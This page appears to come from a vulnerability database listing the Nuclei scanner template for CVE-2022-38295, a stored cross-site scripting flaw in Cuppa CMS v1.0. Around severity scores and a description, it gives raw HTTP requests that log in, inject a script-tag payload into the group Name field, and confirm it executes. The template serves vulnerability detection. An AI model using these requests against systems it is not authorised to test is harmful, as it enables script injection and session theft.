Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-38295
HistoryApr 21, 2023 - 8:56 a.m.

Cuppa CMS v1.0 - Cross Site Scripting

2023-04-2108:56:01
ProjectDiscovery
github.com
9
cuppacms
cuppa
authenticated
xss
cross-site scripting
web scripts

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

59.3%

Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
id: CVE-2022-38295

info:
  name: Cuppa CMS v1.0 - Cross Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
  reference:
    - https://github.com/CuppaCMS/CuppaCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-38295
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-38295
    cwe-id: CWE-79
    epss-score: 0.0024
    epss-percentile: 0.61973
    cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cuppacms
    product: cuppacms
  tags: cve2022,cve,xss,cuppa,authenticated,cuppacms

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&password={{password}}&language=en&task=login
      - |
        POST /components/table_manager/classes/functions.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        id_field=0&name_field="><script>alert(document.domain)</script>&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable
      - |
        POST /components/table_manager/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        path=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '"><script>alert(document.domain)</script>'
          - 'cuppa_html'
        condition: and

      - type: word
        part: header_3
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402204c52ee83dc3ebe4435cca541e93f6e7bbfde2f9ae48f17a5743f6d3665a2103502205252a22ab5b06c438b0720e3e4eed7e8cae05f8fb9c0496315c348f30b22636d:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

59.3%

Related for NUCLEI:CVE-2022-38295